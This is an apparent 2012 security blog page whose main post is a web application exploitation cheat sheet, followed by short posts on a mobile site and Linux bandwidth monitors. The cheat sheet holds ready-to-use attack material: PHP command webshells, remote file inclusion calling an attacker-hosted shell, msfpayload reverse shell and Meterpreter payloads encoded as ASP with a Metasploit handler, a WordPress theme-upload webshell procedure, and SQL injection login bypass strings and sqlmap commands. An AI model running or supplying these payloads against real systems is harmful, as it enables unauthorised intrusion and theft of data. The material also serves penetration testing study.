Apr 19, 2012

Web Application exploitation - a cheatsheet By Tim Arneaud

If you want to get the full article, please go to the Source.


WebShell Backdoors
Minimal php command shells

file cmd.php: PHP script text =>

<?php system($_GET['cmd']) ?>

or

<?php system($_REQUEST['cmd']); ?>

Example usage via Remote File Include (RFI):

http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php


Encoding windows reverse command shell as asp

msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp

Encoding meterpreter in asp

msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp

------

attacker msfconsole:

use multi/exploit/handler

set payload windows/meterpreter/reverse_tcp

set LHOST <attacker-ip>

set LPORT <attacker-multi-handler-port>

exploit


Specific Web applications

Joomla

Joomla default database configuration filename

<web-app-path>/configuration.php

Scanning Joomla! for plugins and versions

/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>

/pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla


WordPress

WordPress
 default database configuration filename
<web-app-path>

WordPress default login page

<web-app-path>
/wp-login.php
WordPress plugins

<web-app-path>
/wp-content/plugins
Scanning WordPress for plugins and versions

/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]

/pentest/enumeration/web/cms-explorer 
 -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:

mkdir wpx

vi wpx/cmd.php

cat wpx/cmd.php

<?php system($_GET['cmd']) ?>

zip -r wpx.zip wpx

upload wpx.zip via web interface as an installed theme

Command execution access is via: 

<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)> 

Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)


Cacti

Cacti default database configuration filename

<web-app-path>
/include/config.php

DeV!L`z ClanPortal

DeV!L`z ClanPortal default database configuration filename

<web-app-path>
/inc/mysql.php

Drupal

Drupal
 default database configuration filename
<web-app-path>
/sites/default/settings.php

Scanning WordPress for plugins and versions
/pentest/enumeration/web/cms-explorer  -url <target-and-drupal-path> -type drupal

Timeclock
Timeclock default database configuration filename
<web-app-path>/db.php
 
SQL Terminators/Comments
MSSQL and MySQL:

<sql injected command>;--

MySQL:

<sql injected command>;#


Login Pages Basic SQL injection 

MS IIS

' OR '1=1';--


MySQL

'OR 1=1--


SQLMap commands

cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator

./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba



Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html

If you like my blog, Please Donate Me

Apr 18, 2012

My website in mobile version by Dudamobile

I try to create my website for easily view in your mobile by use the Dudamobile service. So you can view my site in mobile version with below URL.

When you visit my site with your mobile, I add the script that will redirect you to mobile version.

URL: http://mobile.dudamobile.com/site/r00tsec_blogspot
Shorten URL: http://bit.ly/J9KOtu



If you like my blog, Please Donate Me

Apr 17, 2012

Monitor your bandwidth from the Linux shell

If you want to see full article, please go to the source

Bmon

bmon is a bandwidth monitor, intended for debugging and real-time monitoring purposes, capable of retrieving statistics from various input modules. It provides various output methods including a curses based interface. A set of architecture specific input modules provide the core with the list of interfaces and their counters.
The core stores this counters and provides rate estimation including a history over the last 60 seconds, minutes, hours and days to the output modules which output them according to the configuration, when running, you can select the interface to monitor and press “g” to see an active graph like this one:
bmon-1

speedometer

This is an interesting project that permits to display and measure the rate of data across a network connection or data being stored in a file,
As you can see, although it’s a command-line based tool, yet it has pretty vivid colors and other stuff that makes it a pretty user-friendly tool, it has the ability to monitor the current download/upload speeds of the network connections and it can be used also to measure the speed of the write to a filesystem.
speedometer-mono
Some of his features are:
  • Change update intervals (default is “1″ second).
  • Supports few built-in color depths (1,16-default, 88 and 256), higher numbers mean better quality outputs.
  • Monitors network interfaces (upload & download) and your file system.
  • Can be setup to use plain text rather than graphs.

nload

nload is a console application which monitors network traffic and bandwidth usage in real-time. It visualizes the in and outgoing traffic using two graphs and provides more info like total amount of transferred data and min/max network usage. This program uses the Ncurses libraries and so you’ll be able to interact with the mouse in the terminal.
nload
Features of nload
  • Supports all Ethernet interfaces.
  • View the bandwidth with a real-time graph in the shell.
  • Ability to organize the scale, the time to update the graph and the unit of measure.
 Source: http://linuxaria.com/article/monitor-your-bandwidth-from-the-linux-shell

If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |